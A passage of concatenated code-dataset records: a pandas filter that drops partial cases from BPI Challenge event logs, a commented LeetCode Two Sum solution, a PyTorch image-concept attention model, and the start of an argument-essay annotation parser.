(df_two_lasts['event concept:name'] == 'Send for Credit Collection')\n bool2 = (df_two_lasts['event'] == 'last') & (df_two_lasts['event concept:name'] == 'Payment')\n bool3 = (df_two_lasts['event'] == 'last') & (df_two_lasts['event concept:name'] == 'Send Fine')\n bool4 = (df_two_lasts['event'] == 'second_last') & (df_two_lasts['event concept:name'] == 'Payment')\n\n df_pay_credit = df_two_lasts[bool1 + bool2]\n df_pay_fine = df_two_lasts[bool3 + bool4].sort_values(by='case concept:name', ascending=True)\n counts = df_pay_fine['case concept:name'].value_counts()\n df_pay_fine = df_pay_fine[df_pay_fine['case concept:name'].isin(counts.index[counts > 1])]\n df_fine = df_pay_fine[df_pay_fine['event'] == 'last']\n\n df_last_no_partial = pd.concat([df_fine, df_pay_credit])\n df_last_no_partial\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"BPI Challenge 2017-training.csv\" or dataset == \"BPI Challenge 2017-test.csv\":\n print(\"drop partial cases of\", dataset)\n last_data = df[['eventID ', 'case concept:name', 'event concept:name', 'event lifecycle:transition',\n 'event time:timestamp']].copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n # get more insight\n df_group = df_last.groupby('event concept:name').count()\n df_group['percentage'] = (df_group['eventID '] / df_last.groupby('event concept:name').count().sum()[\n 'eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_last['event concept:name'] == 'O_Cancelled')\n bool2 = (df_last['event concept:name'] == 'W_Validate application') & (\n df_last['event lifecycle:transition'] == 'complete')\n bool3 = (df_last['event concept:name'] == 'W_Validate application') & (\n df_last['event lifecycle:transition'] == 'ate_abort')\n bool4 = (df_last['event concept:name'] == 'W_Call after offers') & (\n df_last['event lifecycle:transition'] == 'complete') # extra\n bool5 = (df_last['event concept:name'] == 'W_Call after offers') & (\n df_last['event lifecycle:transition'] == 'ate_abort') # extra\n bool6 = (df_last['event concept:name'] == 'W_Complete application') & (\n df_last['event lifecycle:transition'] == 'complete')\n bool7 = (df_last['event concept:name'] == 'W_Complete application') & (\n df_last['event lifecycle:transition'] == 'ate_abort')\n df_last_no_partial = df_last[bool1 + bool2 + bool3 + bool4 + bool5 + bool6 + bool7]\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"BPI Challenge 2018-training.csv\" or dataset == \"BPI Challenge 2018-test.csv\":\n print(\"drop partial cases of\", dataset)\n last_data = df[['eventID ', 'case concept:name', 'event concept:name', 'event lifecycle:transition',\n 'event time:timestamp']].copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n # get more insight\n df_group = df_last.groupby(['event concept:name', 'event lifecycle:transition']).count()\n df_group['percentage'] = (df_group['eventID '] /\n df_last.groupby(['event concept:name', 'event lifecycle:transition']).count().sum()[\n 'eventID ']) * 100\n df_group.sort_values(by='percentage', ascending=False)\n 
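Throughout `partialcases.py`, masks are combined with `+`, which works because adding boolean Series is an element-wise OR in current pandas/NumPy; `|` (or `Series.isin`) expresses the same selection more directly. A small check, independent of the BPI data:

```python
import pandas as pd

df = pd.DataFrame({"event": ["A_DECLINED", "A_CANCELLED", "O_Created"]})
m1 = df["event"] == "A_DECLINED"
m2 = df["event"] == "A_CANCELLED"

# `m1 + m2` and `m1 | m2` select the same rows; isin is the idiomatic spelling
assert df[m1 + m2].equals(df[m1 | m2])
assert df[m1 | m2].equals(df[df["event"].isin(["A_DECLINED", "A_CANCELLED"])])
```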
df_group[['percentage']]\n\n # select non-partial events of cases\n bool1 = (df_last['event concept:name'] == 'finish payment')\n df_last_no_partial = df_last[bool1]\n\n # select all events of non-partial cases\n df = df[df['case concept:name'].isin(list(df_last_no_partial['case concept:name']))]\n return df\n\n elif dataset == \"BPI_Challenge_2019-training.csv\" or dataset == \"BPI_Challenge_2019-test.csv\":\n print(\"drop partial cases of\", dataset) \n if dataset == \"BPI_Challenge_2019-training.csv\":\n # remove wrong dates\n df_wrongdate = df[df['event time:timestamp'].dt.year != 2018]\n wrongdates = df_wrongdate['case concept:name'].unique()\n df = df.loc[~df['case concept:name'].isin(wrongdates)]\n\n # make 4 categories of the dataset\n threewaybefore = df[df['case Item Category'] == '3-way match, invoice before GR']\n threewayafter = df[df['case Item Category'] == '3-way match, invoice after GR']\n consignment = df[df['case Item Category'] == 'Consignment']\n twoway = df[df['case Item Category'] == '2-way match']\n\n ################# category 1: 3 way before ######################\n last_data1 = threewaybefore[\n ['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean1 = ~last_data1.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last1 = last_data1[boolean1]\n\n # get more insight\n df_group1 = df_last1.groupby(['event concept:name']).count()\n df_group1['percentage'] = (df_group1['eventID '] / df_last1.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group1.sort_values(by='percentage', ascending=False)\n df_group1[['percentage']]\n\n # select non-partial events of cases\n bool1_1 = (df_last1['event concept:name'] == 'Clear Invoice')\n bool1_2 = (df_last1['event concept:name'] == 'Cancel Goods Receipt')\n bool1_3 = (df_last1['event concept:name'] == 'Record Goods Receipt')\n bool1_4 = (df_last1['event concept:name'] == 'Delete Purchase Order Item')\n bool1_5 = (df_last1['event concept:name'] == 'Change Approval for Purchase Order')\n df_last_no_partial1 = df_last1[bool1_1 + bool1_2 + bool1_3 + bool1_4 + bool1_5]\n\n # select all events of non-partial cases\n threewaybefore = threewaybefore[\n threewaybefore['case concept:name'].isin(list(df_last_no_partial1['case concept:name']))]\n\n ############## category 2: 3 way after ##############\n last_data2 = threewayafter[\n ['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean2 = ~last_data2.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last2 = last_data2[boolean2]\n\n # get more insight\n df_group2 = df_last2.groupby(['event concept:name']).count()\n df_group2['percentage'] = (df_group2['eventID '] / df_last2.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group2.sort_values(by='percentage', ascending=False)\n df_group2[['percentage']]\n\n # select non-partial events of cases\n bool2_1 = (df_last2['event concept:name'] == 'Clear Invoice')\n bool2_2 = (df_last2['event concept:name'] == 'Cancel Invoice Receipt')\n bool2_3 = (df_last2['event concept:name'] == 'Record Invoice Receipt')\n bool2_4 = (df_last2['event concept:name'] == 'Delete Purchase Order Item')\n bool2_5 = (df_last2['event concept:name'] == 'Change Approval for Purchase Order')\n bool2_6 = (df_last2['event concept:name'] == 'Record Service Entry Sheet')\n df_last_no_partial2 = df_last2[bool2_1 + bool2_2 + bool2_3 + bool2_4 + bool2_5 + bool2_6]\n\n # 
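The recurring `~duplicated(..., keep='last')` trick in this record keeps exactly one row per case: its final event. A compact, self-contained illustration on a toy log (not BPI data):

```python
import pandas as pd

log = pd.DataFrame({
    "case concept:name": [1, 1, 2, 2, 2],
    "event concept:name": ["Create", "Payment", "Create", "Send Fine", "Payment"],
})
# mark every row except each case's last occurrence, then invert the mask
last = log[~log.duplicated(["case concept:name"], keep="last")]
assert list(last["event concept:name"]) == ["Payment", "Payment"]
```

`log.groupby("case concept:name").tail(1)` is an equivalent spelling of the same selection.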
select all events of non-partial cases\n threewayafter = threewayafter[\n threewayafter['case concept:name'].isin(list(df_last_no_partial2['case concept:name']))]\n\n ############## category 3: consignment #############\n last_data3 = consignment[['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean3 = ~last_data3.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last3 = last_data3[boolean3]\n\n # get more insight\n df_group3 = df_last3.groupby(['event concept:name']).count()\n df_group3['percentage'] = (df_group3['eventID '] / df_last3.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group3.sort_values(by='percentage', ascending=False)\n df_group3[['percentage']]\n\n # select non-partial events of cases\n bool3_1 = (df_last3['event concept:name'] == 'Cancel Goods Receipt')\n bool3_2 = (df_last3['event concept:name'] == 'Record Goods Receipt')\n bool3_3 = (df_last3['event concept:name'] == 'Delete Purchase Order Item')\n df_last_no_partial3 = df_last3[bool3_1 + bool3_2 + bool3_3]\n\n # select all events of non-partial cases\n consignment = consignment[consignment['case concept:name'].isin(list(df_last_no_partial3['case concept:name']))]\n\n ########## category 4: 2 way #############\n last_data4 = twoway[['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean4 = ~last_data4.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last4 = last_data4[boolean4]\n\n # get more insight\n df_group4 = df_last4.groupby(['event concept:name']).count()\n df_group4['percentage'] = (df_group4['eventID '] / df_last4.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group4.sort_values(by='percentage', ascending=False)\n df_group4[['percentage']]\n\n # select non-partial events of cases\n bool4_1 = (df_last4['event concept:name'] == 'Clear Invoice')\n bool4_2 = (df_last4['event concept:name'] == 'Record Invoice Receipt')\n bool4_3 = (df_last4['event concept:name'] == 'Delete Purchase Order Item')\n bool4_4 = (df_last4['event concept:name'] == 'Change Approval for Purchase Order')\n df_last_no_partial4 = df_last4[bool4_1 + bool4_2 + bool4_3 + bool4_4]\n\n # select all events of non-partial cases\n twoway = twoway[twoway['case concept:name'].isin(list(df_last_no_partial4['case concept:name']))]\n\n df = pd.concat([threewaybefore, threewayafter, consignment, twoway])\n return df\n\n else:\n print(\"No preset dataset found, will drop partial cases on a 20 percent threshold\") \n # if it is an arbitrary dataset, use threshold of 20 percent\n last_data = df.copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n events_kept = df_last['event concept:name'].value_counts() / len(df_last)\n events_kept = events_kept.index[events_kept >= 0.20]\n\n df_last_no_partial = df_last[df_last['event concept:name'].isin(events_kept)]\n df = df[df['case concept:name'].isin(df_last_no_partial['case concept:name'].unique())]\n return df","sub_path":"processminingtool/partialcases.py","file_name":"partialcases.py","file_ext":"py","file_size_in_byte":14715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"515362462","text":"'''\nhttps://leetcode.com/problems/two-sum/\n\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nExample:\n\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\n'''\n\n# Approach 1\n'''\nBrute force\n\n\nIterate over all pairs in the array:\nouter loop i: 0..n-1\n inner loop from i+1 to n\n since each input is assumed to have exactly one answer,\n return (i, j) as soon as a pair sums to the target\n\ntime complexity: O(n^2)\nleetcode result:\nAccepted\t5988 ms\t13.7 MB\n'''\n\n\nclass Solution1:\n def twoSum(self, nums, target: int):\n n = len(nums)\n for i in range(n - 1):\n for j in range(i + 1, n):\n if nums[i] + nums[j] == target:\n return [i, j]\n\n\n'''\nApproach 2:\nFirst sort the elements in ascending order (the sort costs O(n log n)),\nthen squeeze two pointers in from both ends:\nif the two elements sum to more than target,\nmove the rightmost pointer j to the left;\nif they sum to less than target,\nmove the leftmost pointer to the right;\nstop when the pair is found or the pointers meet (i==j)\n\ntime complexity: O(n log n), dominated by the sort\n\nleetcode result:\nRuntime: 52 ms, faster than 56.49% of Python3 online submissions for Two Sum.\nMemory Usage: 14 MB, less than 65.58% of Python3 online submissions for Two Sum.\n'''\n\n\nclass Solution2:\n def twoSum(self, nums, target: int):\n orignal_list = nums.copy()\n n = len(nums)\n nums.sort()\n i = 0\n j = n - 1\n while True:\n if (nums[i] + nums[j] > target):\n j = j - 1\n elif (nums[i] + nums[j] < target):\n i = i + 1\n else:\n break;\n return self._find_index(orignal_list, nums[i], nums[j])\n\n def _find_index(self, input_list, a, b):\n index_a = input_list.index(a)\n index_b = input_list.index(b)\n # handle duplicate values (a == b would yield the same index twice)\n if index_a == index_b:\n [index_a, index_b] = [i for i, x in enumerate(input_list) if x == a]\n return [index_a, index_b]\n\n\n'''\nApproach 3: trade space for time (dictionary)\nI am not yet fluent with hash tables, so this solution is to be refined later;\nfor now, try the space-for-time approach.\n\nThe idea is to store target - element in a dictionary for every element of the list.\nWhen a later element of the list already exists in the dictionary, it matches an earlier element.\n===========\nFirst check whether the current list element is already in the dictionary:\n\nif it is, return the stored index and the current index (a pair has been found);\nif not, store the current index under the subtraction result for later lookups.\n\nThis is only slightly faster than the previous one (4 ms); the time complexity should be O(N).\nIt uses 0.2 MB more RAM,\nthough that depends on the size of the array,\nbut the code is much cleaner.\n\nRuntime: 48 ms, faster than 79.16% of Python3 online submissions for Two Sum.\nMemory Usage: 14.2 MB, less than 56.04% of Python3 online submissions for Two Sum.\n\n'''\n\n\nclass Solution3:\n def twoSum(self, nums, target: int):\n temp_dict = {}\n for key, item in enumerate(nums):\n check_result = target - item\n if item in temp_dict:\n return [temp_dict[item], key]\n else:\n temp_dict[check_result] = key\n\n\n\n\nif __name__ == \"__main__\":\n # k=[4,5,1,3,2]\n # k.sort()\n # print(k)3\n s1 = Solution3().twoSum([4, 3, 3], 6)\n print(s1)\n","sub_path":"Week_01/G20190343010191/LeetCode_1_191.py","file_name":"LeetCode_1_191.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"69513597","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 15:50:14 2019\n\n@author: amrita\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom utils import one_hot\nimport numpy as np\nimport torchvision.models as models\nimport os\n\nclass AttributeCatalog():\n \n def __init__(self, opt, vocab_size):\n self.net = _Net(opt, vocab_size)\n if opt.load_checkpoint_path:\n try:\n print('loading checkpoint from %s', os.path.join('checkpoints',opt.load_checkpoint_path))\n checkpoint = torch.load(os.path.join('checkpoints',os.path.join(opt.load_checkpoint_path, 'checkpoint_best.pt')))\n self.net.load_state_dict(checkpoint['model_state'])\n print ('Model loaded')\n except:\n print ('Model initialized... 
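The dictionary-based `Solution3` above is the standard one-pass answer and also sidesteps `Solution2`'s fragile `list.index` lookups for duplicate values. A quick harness with the equivalent inverted bookkeeping (store value → index instead of complement → index; the inputs are illustrative):

```python
def two_sum(nums, target):
    seen = {}                        # value -> index of a previously seen element
    for i, x in enumerate(nums):
        if target - x in seen:       # the complement already passed by
            return [seen[target - x], i]
        seen[x] = i

assert two_sum([2, 7, 11, 15], 9) == [0, 1]
assert two_sum([4, 3, 3], 6) == [1, 2]   # duplicates handled by index order
```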
Not loaded')\n self.num_classes = vocab_size\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.net.parameters(), lr=opt.learning_rate)\n self.use_cuda = len(opt.gpu_ids) > 0 and torch.cuda.is_available()\n self.gpu_ids = opt.gpu_ids\n if self.use_cuda:\n self.net.cuda(opt.gpu_ids[0])\n print ('transferred model to gpu')\n self.device = 'cuda'\n else:\n self.device = 'cpu'\n self.input, self.label, self.label_onehot = None, None, None\n \n def _to_var(self, x): \n if self.use_cuda:\n x = x.cuda()\n return Variable(x)\n \n def set_input(self, context_word_glove_emb, context_attention_vector, x, y=None):\n self.input = self._to_var(x)\n self.context_word_glove_emb = self._to_var(context_word_glove_emb)\n self.context_attention_vector = self._to_var(context_attention_vector)\n if y is not None:\n self.label = self._to_var(y)\n self.label_onehot = one_hot(self.label, self.label.size(0), self.num_classes, self.device).long()\n \n \n def forward(self):\n self.pred = self.net(self.input, self.context_word_glove_emb, self.context_attention_vector)\n if self.label_onehot is not None:\n self.loss = self.criterion(self.pred, self.label)\n\n def get_loss(self):\n return self.loss.data\n \n def compute_score(self):\n logits = torch.max(self.pred, 1)[1].cpu().numpy()\n label = self.label.cpu().numpy()\n score = (logits==label).astype(np.int).sum() / label.shape[0]\n return score\n \n def step(self):\n self.optimizer.zero_grad()\n self.forward()\n self.loss.backward()\n nn.utils.clip_grad_norm_(self.net.parameters(), 0.25)\n self.optimizer.step()\n return\n \n def get_pred(self):\n return self.pred.data.cpu().numpy()\n \n def eval_mode(self):\n self.net.eval()\n \n def train_mode(self):\n self.net.train()\n \n def save_checkpoint(self, save_path):\n checkpoint = {\n 'model_state': self.net.cpu().state_dict()\n }\n torch.save(checkpoint, save_path)\n if self.use_cuda:\n self.net.cuda(self.gpu_ids[0])\n \n'''\nclass _Net(nn.Module):\n\n def __init__(self, hidden_dim):\n super(_Net, self).__init__()\n self.hidden_dim = hidden_dim\n self.num_classes = 2\n \n self.leaky_relu = nn.LeakyReLU()\n self.relu = nn.ReLU()\n \n layers = []\n layers.append(nn.Linear(2048, self.hidden_dim))\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.LeakyReLU())\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.LeakyReLU())\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.ReLU())\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n self.main = nn.Sequential(*layers)\n self.final_layer = nn.Linear(self.hidden_dim, self.num_classes)\n \n def forward(self, x):\n x = self.main(x)\n output = self.final_layer(x)\n out_dist = F.softmax(output, dim=1)\n return out_dist\n'''\n\n\nclass _Net(nn.Module):\n \n def __init__(self, opt, vocab_size):\n super(_Net, self).__init__()\n self.use_cuda = len(opt.gpu_ids) > 0 and torch.cuda.is_available()\n self.gpu_ids = opt.gpu_ids\n if self.use_cuda:\n self.device = 'cuda'\n else:\n self.device = 'cpu'\n self.input_channels = opt.input_channels\n self.img_feat_size = opt.image_feature_size\n self.hidden_size = opt.hidden_size\n self.cluster_classify = opt.cluster_classify\n self.common_emb_size = opt.common_embedding_size\n self.glove_emb_size = opt.glove_embedding_size\n self.fc1_size = opt.fc1_size\n self.fc2_size = opt.fc2_size\n self.num_att_layers = opt.num_att_layers\n self.tanh = nn.Tanh\n self.dropout 
= nn.Dropout(0.2)\n self.softmax = nn.Softmax(dim=1)\n self.vocab_size = vocab_size\n resnet = models.resnet34(pretrained=True)\n resnet_layers = list(resnet.children())\n #for layer in resnet_layers:\n # for param in layer.parameters():\n # param.requires_grad = False\n # remove the last two layer\n resnet_layers.pop()\n resnet_layers.pop()\n # remove the first layer as we take a 6-channel input\n resnet_layers.pop(0)\n resnet_layers.insert(0, nn.Conv2d(self.input_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False))\n self.resnet_layers_seq = nn.Sequential(*resnet_layers)\n self.image_pooling_layer = nn.AdaptiveAvgPool2d(output_size=(1, 1))\n self.concept_image_att_mat = nn.Linear(self.glove_emb_size, self.img_feat_size)\n layers1 = []\n layers1.append(nn.Linear(self.img_feat_size, self.hidden_size))\n layers1.append(nn.LeakyReLU())\n layers1.append(nn.Dropout(0.1))\n layers2 = []\n layers2.append(nn.Linear(self.glove_emb_size, self.hidden_size))\n layers2.append(nn.LeakyReLU())\n layers2.append(nn.Dropout(0.1))\n self.layers1_seq = nn.Sequential(*layers1)\n self.layers2_seq = nn.Sequential(*layers2)\n self.img_linear_layers = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.concept_linear_layers = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.img_concept_linear_layers = nn.ModuleList([nn.Linear(self.common_emb_size, 1) for i in range(self.num_att_layers)])\n final_layers = []\n final_layers.append(nn.Dropout(0.1))\n final_layers.append(nn.Linear(self.hidden_size, self.fc1_size))\n final_layers.append(nn.LeakyReLU())\n final_layers.append(nn.Dropout(0.1))\n final_layers.append(nn.Linear(self.fc1_size, self.fc2_size))\n final_layers.append(nn.LeakyReLU())\n final_layers.append(nn.Dropout(0.1))\n final_layers.append(nn.Linear(self.fc2_size, self.vocab_size))\n final_layers.append(nn.LeakyReLU())\n final_layers.append(nn.Dropout(0.1))\n #final_layers.append(nn.Sigmoid())\n self.final_layers_seq = nn.Sequential(*final_layers)\n '''\n if not self.cluster_classify:\n self.cluster_embedding = nn.Parameter(torch.tensor(cluster_embedding_mat), requires_grad=True)\n layers1_2 = []\n layers1_2.append(nn.Linear(self.img_feat_size, self.hidden_size))\n layers1_2.append(nn.LeakyReLU())\n layers1_2.append(nn.Dropout(0.2))\n self.layers1_2_seq = nn.Sequential(*layers1_2)\n layers2_2 = []\n layers2_2.append(nn.Linear(self.glove_emb_size, self.hidden_size))\n layers2_2.append(nn.LeakyReLU())\n layers2_2.append(nn.Dropout(0.2))\n self.layers2_2_seq = nn.Sequential(*layers2_2)\n self.img_linear_layers2 = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.concept_linear_layers2 = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.img_concept_linear_layers2 = nn.ModuleList([nn.Linear(self.common_emb_size, 1) for i in range(self.num_att_layers)])\n final_layers2 = []\n final_layers2.append(nn.Dropout(0.1))\n final_layers2.append(nn.Linear(self.hidden_size, self.fc1_size))\n final_layers2.append(nn.LeakyReLU())\n final_layers2.append(nn.Dropout(0.1))\n final_layers2.append(nn.Linear(self.fc1_size, self.fc2_size))\n final_layers2.append(nn.LeakyReLU())\n final_layers2.append(nn.Dropout(0.1))\n final_layers2.append(nn.Linear(self.fc2_size, self.vocab_size))\n final_layers2.append(nn.LeakyReLU())\n final_layers2.append(nn.Dropout(0.1))\n 
self.final_layers2_seq = nn.Sequential(*final_layers2)\n print ('initialized _Net model')\n self.attention_weight_mat = torch.tensor(attention_weight_mat, requires_grad=False, device=self.device, dtype=torch.long)\n '''\n print ('initialized _Net model')\n \n def forward(self, img, context_glove_embed, context_attention_vector):\n img_emb = self.resnet_layers_seq(img)\n img_emb_pooled = torch.unsqueeze(torch.squeeze(self.image_pooling_layer(img_emb)), dim=1)\n #img_emb_pooled is of dimension batch_size x 1 x img_feat_size\n concept_emb = self.concept_image_att_mat(context_glove_embed)\n #concept_emb is of dimension batch_size x vocab_size x img_feat_size\n concept_emb = torch.transpose(concept_emb, 2, 1)\n #concept_emb is of dimension batch_size x img_feat_size x vocab_size)\n img_concept_emb = torch.squeeze(torch.bmm(img_emb_pooled, concept_emb))\n #img_concept_emb is of dimension batch_size x vocab_size\n img_concept_att = self.softmax(img_concept_emb)\n img_concept_att = torch.unsqueeze(self.mask_attention(img_concept_att, context_attention_vector), dim=1)\n #img_concept_att is of dimension batch_size x 1 x vocab_size\n img_concept_emb = torch.squeeze(torch.bmm(img_concept_att, context_glove_embed))\n #img_concept_emb is of dimension batch_size x glove_emb_size\n img_emb = torch.transpose(torch.transpose(img_emb, 2, 1), 3, 2).view(-1, 64, self.img_feat_size)\n img_hid = self.layers1_seq(img_emb).view(-1, 64, self.hidden_size)\n #imd_hid is of dimension batch_size x 64 x img_hid_size\n img_concept_hid = self.layers2_seq(img_concept_emb)\n #img_concept_hid is of dimension batch_size x concept_hid_size\n i=0\n for i in range(self.num_att_layers):\n img_common = self.img_linear_layers[i](img_hid)\n #img_common is of dimension batch_size x 64 x common_emb_size\n concept_common = self.concept_linear_layers[i](img_concept_hid)\n #concept_common is of dimension batch_size x common_emb_size\n concept_common = torch.unsqueeze(concept_common, dim=1).repeat(1, 64, 1)\n #concept_common is of dimension batch_size x 64 x common_emb_size\n img_concept_common = self.dropout((img_common+concept_common).tanh())\n #img_concept_common is of dimension batch_size x 64 x common_emb_size\n h = torch.squeeze(self.img_concept_linear_layers[i](img_concept_common), dim=2)\n #h is of dimension batch_size x 64\n p_att = torch.unsqueeze(self.softmax(h), dim=1)\n #p_att is of dimension batch_size x 1 x 64\n img_att = torch.squeeze(torch.bmm(p_att, img_hid), dim=1)\n #img_att is of dimension batch_size x img_hid_size\n if i==(self.num_att_layers-1):\n img_concept_hid = img_att\n #concept_hid is of dimension batch_size x img_hid_size\n else:\n img_concept_hid = img_att+img_concept_hid\n #concept_hid is of dimension batch_size x img_hid_size\n clusters = self.final_layers_seq(img_concept_hid)\n #clusters is of dimension batch_size x cluster_size\n return clusters\n# =============================================================================\n# if self.cluster_classify:\n# return clusters \n# else:\n# clusters_att = self.softmax(clusters)\n# #clusters_att is of dimension batch_size x cluster_size\n# clusters_emb = torch.mm(clusters_att, self.cluster_embedding)\n# #clusters_hid is of dimension batch_size x glove_emb_size\n# img_hid2 = self.layers1_2_seq(img_emb).view(-1, 64, self.hidden_size)\n# concept_hid2 = self.layers2_2_seq(clusters_emb)\n# i=0\n# for i in range(self.num_att_layers):\n# img_common2 = self.img_linear_layers2[i](img_hid2)\n# concept_common2 = self.concept_linear_layers2[i](concept_hid2)\n# 
concept_common2 = torch.unsqueeze(concept_common2, dim=1).repeat(1, 64, 1)\n# img_concept_common2 = self.dropout((img_common2+concept_common2).tanh())\n# h2 = torch.squeeze(self.img_concept_linear_layers2[i](img_concept_common2), dim=2)\n# p_att2 = torch.unsqueeze(self.softmax(h2), dim=1)\n# img_att2 = torch.squeeze(torch.bmm(p_att2, img_hid2), dim=1)\n# if i==(self.num_att_layers-1):\n# concept_hid2 = img_att2\n# else:\n# concept_hid2 = img_att2 + concept_hid2\n# concepts = self.final_layers2_seq(concept_hid2) \n# concepts_att = self.softmax(concepts)\n# #concepts_att is of dimension batch_size x vocab_size\n# \n# att_weight = torch.unsqueeze(self.attention_weight_mat, dim=0).repeat(concepts_att.size(0), 1)\n# #att_weight is of dimension batch_size x vocab_size\n# att_weight = torch.gather(clusters, dim=1, index=att_weight)\n# #att_weight is of dimension batch_size x vocab_size\n# concepts_att = torch.mul(concepts_att, att_weight)\n# return concepts_att\n# =============================================================================\n \n def mask_attention(self, attention, mask):\n masked_atten = torch.mul(attention, mask)\n num = len(masked_atten.shape)\n l1norm = torch.sum(masked_atten, dim=1)\n stacked_norm = torch.mul(torch.ones_like(masked_atten), torch.unsqueeze(l1norm,num-1))\n masked_atten = torch.where(stacked_norm==0, torch.ones_like(masked_atten), masked_atten)\n new_l1_norm = torch.sum(masked_atten, dim=1)\n masked_atten = masked_atten/new_l1_norm.view([-1,1])\n return masked_atten \n\ndef get_model(opt, vocab_size):\n model = AttributeCatalog(opt, vocab_size)\n return model\n\n \n\n\n\n\n\n","sub_path":"multiclass_unilabel_cce_level2_attribute/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"21476016","text":"from os import listdir\nimport json\nimport os\nimport re\n\n#############################################\n# PLEASE SET TO CORRECT PATH BEFORE RUNNING #\n#############################################\nCURRENT_WORKING_DIR = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\nCONST_ESSAYPATH = f'{CURRENT_WORKING_DIR}/../data/ArgumentAnnotatedEssays-2.0/brat-project-final/'\nCONST_SUFFICIENTPATH = f'{CURRENT_WORKING_DIR}/../data/UKP-InsufficientArguments_v1.0/data-tokenized.tsv'\nCONST_CONFIRMATIONBIAS = f'{CURRENT_WORKING_DIR}/../data/UKP-OpposingArgumentsInEssays_v1.0/labels.tsv'\n\n\n# Object based on the sample.json file\nclass OutputObject(object):\n id = \"\"\n title = \"\"\n text = \"\"\n major_claim = []\n claims = []\n premises = []\n confirmation_bias = False # not biased until proven guilty\n paragraphs = []\n\n # The class \"constructor\" - It's actually an initializer\n def __init__(self, essay_id, title, text, major_claim, claims, premises, paragraphs, confirmation_bias):\n self.id = essay_id\n self.title = title\n self.text = text\n self.major_claim = major_claim\n self.claims = claims\n self.premises = premises\n self.paragraphs = paragraphs\n self.confirmation_bias = confirmation_bias\n\n\ndef get_entity_contents(file_content: str, entity_name: str) -> list:\n \"\"\"\n :param file_content: content of the essayXXX.ann\n :param entity_name: MajorClaim or Claim or Premise\n :rtype: list\n :return: list of dicts with span, text of given entity and ann-file content\n \"\"\"\n lines = file_content.split(\"\\n\")\n entity_content = []\n for line in lines:\n if re.search(r'\\b' + entity_name + r'\\b', line):\n line 
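`mask_attention` at the end of `_Net` zeroes out disallowed positions and re-normalizes each row, falling back to a uniform distribution when a row is masked out entirely. The renormalization logic can be checked in isolation with a tiny tensor (a sketch of the same idea, not the project's exact code):

```python
import torch

def masked_renorm(attn, mask):
    # zero masked entries, then rescale each row to sum to 1;
    # rows whose probability mass is entirely masked fall back to uniform weights
    masked = attn * mask
    row_sum = masked.sum(dim=1, keepdim=True)
    masked = torch.where(row_sum == 0, torch.ones_like(masked), masked)
    return masked / masked.sum(dim=1, keepdim=True)

attn = torch.tensor([[0.2, 0.3, 0.5], [0.6, 0.4, 0.0]])
mask = torch.tensor([[1.0, 0.0, 1.0], [0.0, 0.0, 0.0]])
out = masked_renorm(attn, mask)
assert torch.allclose(out.sum(dim=1), torch.ones(2))  # every row renormalized
```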
